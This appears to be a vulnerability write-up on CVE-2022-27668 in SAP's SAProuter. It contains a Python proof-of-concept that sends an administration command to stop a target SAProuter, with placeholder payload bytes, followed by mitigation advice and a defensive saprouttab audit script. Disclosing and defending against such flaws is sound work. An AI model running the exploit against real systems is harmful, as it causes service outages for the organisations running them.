In this long read post, we will discuss the details of CVE-2022-27668, a vulnerability found in multiple versions of SAP NetWeaver and ABAP Platform systems. The vulnerability allows an unauthenticated attacker to execute SAProuter administration commands from a remote client, which can severely impact system availability and lead to service disruptions.

Exploit Details

This vulnerability exists because of an improper configuration of the route permission table (the saprouttab file), which governs access control for SAProuter administrative commands. A remote unauthenticated attacker can exploit it by connecting to the SAProuter and issuing administration commands, such as stopping the SAProuter, which leads to a denial of service (DoS) condition.

Below is an example of a Python code snippet demonstrating the exploitation of this vulnerability:

import socket

TARGET_IP = "192.168.1.10"
TARGET_PORT = 3299
SAPROUTER_CONTROL_COMMAND = b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 R CMD XXX"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((TARGET_IP, TARGET_PORT))

# Sending the SAProuter administration command (e.g., stopping the SAProuter)
sock.send(SAPROUTER_CONTROL_COMMAND)
response = sock.recv(1024)

# Print the server response
print("Server response:", response)
sock.close()

Replace the TARGET_IP, TARGET_PORT, and SAPROUTER_CONTROL_COMMAND variables with the appropriate values for your target system and desired command.

For more details about this vulnerability, you can refer to the following sources:

1. The original CVE entry: CVE-2022-27668
2. SAP Security Note: 3014107

To mitigate this vulnerability, SAP has provided the following recommendations:

1. Update the affected SAP software components to the latest available patch levels, as described in SAP Security Note 3014107.
2. Ensure that the saprouttab file has a secure and correct configuration by following SAP's guidelines, such as allowing only trusted IP addresses and explicitly denying access to all others.
3. Implement proper network segmentation and make sure that the SAProuter is not directly exposed to untrusted networks (e.g., the Internet).
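As an added defender-side example (not code from the original post or from SAP), here is a small Python audit of a saprouttab file that flags the kinds of entries recommendation 2 warns against: permit lines whose source is a wildcard rather than a trusted address, native permits to any destination and service, and a table that does not end with an explicit deny-all entry. The sample table, its host names and ports, and the specific rule heuristics are assumptions of this example.

```python
from dataclasses import dataclass

# Constructed sample route permission table; the hosts and ports are made up.
SAMPLE_SAPROUTTAB = """\
# permit one trusted admin host to reach the dispatcher of sapapp01
P 10.0.5.25 sapapp01 3200
# over-permissive: any source may reach any destination on any service
P * * *
S 10.0.5.30 sapapp01 3300
D * * *
"""

@dataclass
class Finding:
    line_no: int   # 0 means the finding concerns the file as a whole
    text: str
    reason: str

def audit_saprouttab(content: str) -> list:
    """Flag entries that contradict 'only trusted sources, explicit deny for the rest'.
    The checks are this example's own heuristics (an assumption), not an SAP rule set."""
    findings = []
    last_rule = None
    for no, raw in enumerate(content.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()        # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        action = parts[0].upper().lstrip("K")      # treat SNC entries (KP/KS/KD) like P/S/D
        if action not in ("P", "S", "D"):
            continue
        if len(parts) < 4:
            findings.append(Finding(no, raw, "malformed entry: need action, source, destination, service"))
            continue
        src, dst, svc = parts[1:4]
        last_rule = (action, src, dst, svc)
        if action in ("P", "S") and "*" in src:
            findings.append(Finding(no, raw, "permit whose source host is a wildcard, not a trusted address"))
        if action == "P" and dst == "*" and svc == "*":
            findings.append(Finding(no, raw, "native permit to any destination and any service"))
    if last_rule != ("D", "*", "*", "*"):
        findings.append(Finding(0, "", "table does not end with an explicit deny-all entry (D * * *)"))
    return findings

if __name__ == "__main__":
    for f in audit_saprouttab(SAMPLE_SAPROUTTAB):
        print(f"line {f.line_no}: {f.reason}  [{f.text}]")
```

Run against the constructed table above, the audit reports two findings, both on the `P * * *` line; a table that omits the trailing deny-all gets a file-level finding.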

In conclusion, CVE-2022-27668 presents a significant risk to SAP NetWeaver and ABAP Platform systems. It is crucial for organizations running these systems to update their software to patched versions and properly configure their route permission tables to prevent unauthorized remote execution of SAProuter administrative commands.

Timeline

Published on: 06/14/2022 17:15:00 UTC
Last modified on: 06/24/2022 15:46:00 UTC